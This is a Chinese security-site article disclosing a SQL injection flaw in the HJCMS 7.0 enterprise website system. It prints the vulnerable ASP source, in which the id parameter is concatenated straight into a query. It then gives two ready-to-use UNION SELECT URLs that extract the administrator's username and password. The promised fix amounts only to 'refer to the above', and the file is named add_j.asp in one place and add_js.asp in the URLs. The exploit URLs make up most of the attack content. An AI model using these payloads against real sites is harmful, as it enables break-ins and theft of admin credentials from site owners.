频道栏目
首页 > 安全 > 网站安全 > 正文

HJCMS企业网站管理系统7.0 注入漏洞及修复

2011-07-05 11:34:46           
收藏   我要投稿

漏洞出在 /hjadmin/add_j.asp

<!--#include file="../conn.asp"-->

<%set js = server.CreateObject("ADODB.RecordSet")sql="select * from ad where id="& request.QueryString("id")set js = conn.Execute (Sql)if js("lx")=1 thengoaler = goaler + "<a href=""adurl.asp?id="& js("id")&""" target="""& js("openfs")&"""><img src="""& js("img")&""" width="""& js("width")&""" height="""& js("height")&"""  title="\""& js("sm")&"""></a>"elseif js("lx")=2 thengoaler = goaler + "<embed src="""&js("img")&""" quality=""height"" type=""application/x-shockwave-flash""  width="""& js("width")&""" height="""& js("height")&""" ></embed>"elsegoaler = goaler + ""& js("code")&""end if生成JS文件goaler = "" + goaler + ""goaler = "document.write(" & goaler & ")"FolderPath = Server.MapPath("../")Set fso = Server.CreateObject("Scripting.FileSystemObject")Set fout = fso.CreateTextFile(FolderPath&"adfilead"& js("id")&".js")fout.WriteLine goaler关闭连接fout.closeset fout = nothingjs.closeset js = nothingconn.closeset conn=nothingResponse.Write "<script>alert(广告JS已经生成!);window.location.href=admin_ad.asp;</script>"%>

在adfile目录下生成一个js 文件。
http://www.2cto.com/hjadmin/add_js.asp?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,admin%20from%20admin

http://www.2cto.com/hjadmin/add_js.asp?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password%20from%20admin
 

修复:参考上文

上一篇:睿拓旅游信息门户系统1.1 注入漏洞及修复
下一篇:奶茶加盟店网站源码1.0 注入漏洞+后门及修复方案
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站